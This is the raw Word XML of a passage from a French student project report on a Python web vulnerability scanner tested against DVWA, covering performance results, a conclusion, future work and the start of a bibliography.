                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4185CDA5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452F1B8B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tous (12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B406CDA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18,3s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319CBA5E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1F54DF14" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="60A7F1AB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DVWA (VM, security=medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="25EF26BB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="62ADA634" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3ACE03AA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tous (12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0C6F6462" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21,7s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="286AABFD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15FED7C3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9122"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="33583A73" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="003366"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p w14:paraId="6CA810FB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="003366"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Analyse des résultats de performance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A04F6B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Le pipeline est linéaire en O(pages × détecteurs × payloads) — scalable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F137471" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • La majorité du temps est passée dans les attentes HTTP (timeout de 10s par requête).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3866F236" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Le mode --only sqli,xss réduit le temps de 70 % tout en couvrant les failles les plus critiques.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6066CF51" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Sur DVWA security=medium, 34 vulnérabilités détectées vs 87 en low — les filtres côté serveur réduisent la surface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632C3E20" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Pas de parallélisme natif — une optimisation future serait asyncio/concurrent.futures pour les requêtes HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AC72C09" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="006A6D93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F14271" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="338EB57B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion Générale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4EDA7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ce Projet de Fin d'Année nous a permis de mener un travail complet en cybersécurité applicative : de l'analyse théorique des menaces jusqu'à la réalisation et la validation d'un outil de détection opérationnel. Nous présentons ci-dessous un bilan synthétique des contributions de chaque chapitre et des perspectives d'évolution du projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADDB75" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bilan du Chapitre 1 — État de l'Art</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C915C2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le premier chapitre a établi les fondements théoriques du projet. Nous avons dressé un panorama complet des cybermenaces web (MITM, injections, SSRF, XXE, IDOR, etc.), analysé en profondeur les dix catégories de l'OWASP Top 10 2021 avec leurs statistiques de prévalence, comparé les quatre outils de référence du marché (ZAP, Burp Suite, Nikto, Acunetix) sur 14 critères, et expliqué le standard CVSS v3.1 utilisé pour scorer nos détections. Cette analyse a mis en évidence le vide dans l'offre actuelle justifiant notre approche : un outil open source, Python-natif, léger et pédagogique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34548FDD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bilan du Chapitre 2 — Conception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1FE9B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le second chapitre a formalisé notre conception via une approche UML rigoureuse : architecture en pipeline à cinq étapes (Crawl → Detect → Deduplicate → Evaluate → Report), diagramme de cas d'utilisation (8 UC), diagramme de classes complet (7 classes, 3 patterns de conception), diagramme de séquence d'un scan complet, description détaillée des 12 modules de détection, et topologie réseau de l'environnement virtualisé (2 VMs VirtualBox en Host-Only). La conception modulaire garantit l'extensibilité : ajouter un nouveau détecteur ne nécessite que la création d'une nouvelle classe héritant de BaseDetector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02555EC2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bilan du Chapitre 3 — Réalisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2020ED14" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le troisième chapitre a présenté la réalisation complète. L'environnement de test virtualisé (Ubuntu 22.04 + DVWA + VirtualBox Host-Only) garantit l'isolation et la reproductibilité. L'implémentation en Python 3.11 couvre 12 détecteurs, un crawler BFS, un evaluator CVSS et un générateur de rapports HTML. La suite de 42 tests unitaires valide chaque composant. Les huit études de cas démontrent la détection effective de toutes les vulnérabilités majeures : SQLi (9.8 Critique), Auth Failures (9.8 Critique), File Upload (8.8 Élevé), SSRF (8.5 Élevé), XXE (8.2 Élevé), Path Traversal (7.5 Élevé), XSS (6.1 Moyen), IDOR (6.5 Moyen). Au total : 70 vulnérabilités détectées en 6 secondes sur 11 pages, couvrant 9 catégories sur 10 de l'OWASP Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33DF60" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Perspectives d'Évolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D3ED1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Plusieurs axes d'amélioration sont envisagés pour les versions futures :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FA2B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Court terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Détecteur A09 (Logging &amp; Monitoring) : analyse des en-têtes de réponse et des configurations de journalisation via l'API d'administration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1481B7DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Court terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Parallélisme des requêtes HTTP via asyncio et aiohttp pour réduire significativement le temps de scan sur les grandes applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F77AFBE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Moyen terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Support des SPA JavaScript via Playwright (crawl dynamique du DOM après exécution JS) pour couvrir les applications React/Angular/Vue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9DDBAC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Moyen terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Intégration CI/CD native (GitHub Actions, GitLab CI) avec seuils de sévérité configurables (fail si CVSS &gt;= 9.0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C01328B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Long terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Interface web de configuration et de visualisation des résultats en temps réel (WebSocket + React).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCEF44" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Long terme : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Support des APIs REST et GraphQL avec génération automatique de cas de test depuis les spécifications OpenAPI/Swagger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673C56A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ce projet a été une opportunité unique d'allier théorie et pratique dans le domaine de la cybersécurité offensive et défensive. Les compétences acquises — Python avancé, architecture logicielle, protocoles HTTP, vulnérabilités OWASP, CVSS v3.1, virtualisation, tests unitaires — constituent un socle solide pour une carrière dans la sécurité informatique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526958CF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E80ED38" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bibliographie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23194607" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 — 2021, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://owasp.org/Top10/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0355D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Verizon, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">2023 Data Breach Investigations Report, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.verizon.com/business/resources/reports/dbir/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2BFAD0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
